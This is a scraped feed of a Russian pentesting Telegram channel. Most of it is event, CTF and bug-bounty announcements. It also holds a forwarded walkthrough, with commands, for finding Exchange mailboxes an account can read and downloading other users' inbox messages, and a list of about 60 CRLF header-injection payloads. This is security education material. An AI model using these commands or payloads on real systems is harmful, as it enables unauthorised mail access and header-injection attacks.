Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
🧲 LAN-party для пентестеров: прорываемся к домен контроллеру через розетку

Сегодня расскажу про внутренний пентест, в ходе которого мы без учетной записи добрались до администратора домена.

В этом проекте использовались много разнообразных техник: от декомпиляции приложения и расшифровки извлеченных учетных данных, до повышения привилегий через базу данных на сервере и сбора информации от имени учетной записи компьютера. Под катом подробно разобрано, как они сложились в успешный вектор атаки.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍5
Forwarded from true_security
list.png
45.3 KB
Первой публикацией я хотел бы поделиться интересной историей про ms exchange.
Пользователи могут управлять разрешениями на доступ к каталогам своей электронной почты.
Это может делать и почтовый администратор.
При получении доступа к одной эл.почте мы можем проверить права доступа к чужим эл.ящикам:
!!!Важно, ваша учетная запись должна иметь доступ по протоколу ews!!!

1) выгрузить список всех адресов из глобальной адресной книги:
например, через MailSniper.ps1 (https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1)
Get-GlobalAddressList -ExchHostname owa.server.com -UserName domain\user -Password password123 -OutFile gal.txt

2) запустить проверку прав доступа через мой скрипт:
https://github.com/feedb/ebussing/blob/main/ge.py
в файлу gal.txt у вас должна находиться адреса эл.почты
python3 ge.py

Будут выводиться записи root, где то будет отображаться дерево как на скриншоте.
Наличие дерева подразумевает доступ вашей учетной записи к каталогам и их содержимому эл.ящика (см.скриншот)
3) находим почты с разрешенным доступом и выгружаем содержимое каталога входящих писем скриптом:
https://github.com/feedb/ebussing/blob/main/download.py
в emails.txt складываем почты в которых есть доступ к inbox/входящие, создаем каталог out
и запускаем
python3 get.py


В каталоге out будут сохраняться eml чужих сообщений
P.s. скрипты написаны на коленке, в новой версии будут параметры и т.д.
🔥8😈1
Митап Газпром.тех
#митап

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
🏠 Телепортация в КиберДоме
#кибердом

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
😎 ВЗЛОМ НА ВЫСОТЕ 😎

Один мой очень хороший знакомый занимается физическим пентестом (сокр. физикой). Мало того, что у него очень интересный бекграунд, так он проворачивает анализы защищенности не хуже, чем в фильмах "Миссия невыполнима". Поэтому особенно советую прочитать его надеюсь последний в этом году, но не последний в будущем физический пентест.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥185👍5👎21
💙 Подарок на Новый Год от команды 🕐🕑🕒

Большое спасибо вам за сами подарки, за душевные и интересные мероприятия в этом году, за прекрасное обновление платформы BI.ZONE BugBounty 🪲
И отдельное спасибо ENZO, как от администратора канала, за приятную связь с админами телеграм каналов)

🔥 Желаю вам ещё бо́льших успехов в следующем году и щепотку удачи 😉

P.S. в посте не весь комплект, выбрал то что получилось красиво сфотографировать)
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥8🥰32👎22❤‍🔥1
🕛 CTF RedShift190 2023 🕛
#CTF

🏁 В недалёком будущем произошёл инцидент. Сможешь ли ты справиться с заданиями и провести расследование, как настоящий кибер-сыщик?

➡️ Колледж РТУ МИРЭА в период с 18 по 23 декабря проводится регистрация на CTF в онлайн формате. С 23 по 25 декабря пройдёт сама CTF. Мероприятие является открытым, приглашаются все желающие!

Твоя задача состоит из двух частей - сетевых дампов, по которым нужно расследовать происшествие, и ТГ-бота, ссылку на которого нам прислали из будущего. Не бойся сложностей: в решении помогут подсказки из архива воспоминаний потенциального нарушителя. За каждую часть можно получить 50 баллов.
И не забывай: больше - лучше. Зови с собой друзей, мы приветствуем коллаборации и не ограничиваем количество участников от одного учебного заведения или компании.

Присылай свою заявку через платформу онлайн-регистрации.
Еще больше информации - в 
ТГ-канале соревнований.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👾1
This media is not supported in your browser
VIEW IN TELEGRAM
🌚 New Year Poxek pack 🌚

🪄 У нас тут новые стикеры вышли. Прошу оценить их!

🌚 Новогоднего настроения вам!

💰 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥177🤣211
Forwarded from Standoff 365
🆕 Запускаем новую багбаунти-программу!

Что:
облачный межсетевой экран уровня веб-приложений PT Cloud Application Firewall

Где:
на Standoff 365 Bug Bounty

Когда:
с 20 декабря 2023 года по 20 января 2024 года

Продукт PT Cloud Application Firewall распространяется по ежемесячной подписке через технологических партнеров — авторизованных сервисных и облачных провайдеров.

По условиям программы, все зарегистрированные на платформе исследователи смогут, используя метод черного ящика, искать уязвимости в ресурсах, которые находятся на домене .ptcloud.ru.

Максимальное вознаграждение за найденные баги: 500 тысяч рублей. А тому, кто первым сдаст критическую уязвимость — мы подарим ящик нашего фирменного пива Блэк Хет.

⚡️ Начать искать баги

Итоги багбаунти-программы будут подведены 29 января 2024 года
Please open Telegram to view this post
VIEW IN TELEGRAM
👎4🔥4🤣1
This media is not supported in your browser
VIEW IN TELEGRAM
🔥1755👎1🥰1🌚11
😉 Немного про построение векторов атак

Как правило, домен на базе Active Directory обладает значительным количеством объектов, свойств и связей между ними. В общем случае «вручную» выявить недостатки в настройке домена и на их основе построить вероятный вектор атаки является довольно трудоемкой задачей и справится с ней без вспомогательных программных средств не представляется возможным.

В настоящем материале будет представлен обзор некоторых программных средств, использующихся для автоматизированного построения вероятных атак в домене. Кроме того, будут рассмотрены некоторые подходы к улучшению уже имеющихся решений, а также предложен собственный алгоритм к выявлению наиболее приоритетных целей атак.

📌 Важно отметить, что материал рассчитан на читателя, обладающего опытом по тестированию на проникновение Active Directory.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5🔥4👎1
CRLF Injection Payloads
#заметки

%0AHeader-Test:POXEK
%0A%20Header-Test:POXEK
%20%0AHeader-Test:POXEK
%23%OAHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
%3F%0AHeader-Test:POXEK
crlf%0AHeader-Test:POXEK
crlf%0A%20Header-Test:POXEK
crlf%20%0AHeader-Test:POXEK
crlf%23%OAHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
crlf%3F%0AHeader-Test:POXEK
%0DHeader-Test:POXEK
%0D%20Header-Test:POXEK
%20%0DHeader-Test:POXEK
%23%0DHeader-Test:POXEK
%23%0AHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
%3F%0DHeader-Test:POXEK
crlf%0DHeader-Test:POXEK
crlf%0D%20Header-Test:POXEK
crlf%20%0DHeader-Test:POXEK
crlf%23%0DHeader-Test:POXEK
crlf%23%0AHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
crlf%3F%0DHeader-Test:POXEK
%0D%0AHeader-Test:POXEK
%0D%0A%20Header-Test:POXEK
%20%0D%0AHeader-Test:POXEK
%23%0D%0AHeader-Test:POXEK
\r\nHeader-Test:POXEK
\r\n Header-Test:POXEK
\r\n Header-Test:POXEK
%5cr%5cnHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
%3F%0D%0AHeader-Test:POXEK
crlf%0D%0AHeader-Test:POXEK
crlf%0D%0A%20Header-Test:POXEK
crlf%20%0D%0AHeader-Test:POXEK
crlf%23%0D%0AHeader-Test:POXEK
crlf\r\nHeader-Test:POXEK
crlf%5cr%5cnHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
crlf%3F%0D%0AHeader-Test:POXEK
%0D%0A%09Header-Test:POXEK
crlf%0D%0A%09Header-Test:POXEK
%250AHeader-Test:POXEK
%25250AHeader-Test:POXEK
%%0A0AHeader-Test:POXEK
%25%30AHeader-Test:POXEK
%25%30%61Header-Test:POXEK
%u000AHeader-Test:POXEK
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:POXEK
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:POXEK
/google.com/%2F..%0D%0AHeader-Test:POXEK


🪄 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥92👎1
Картинка из утренней заметки, а то вдруг вы ее пропустили или посчитали неинтересной аннотацию 😊
922👎1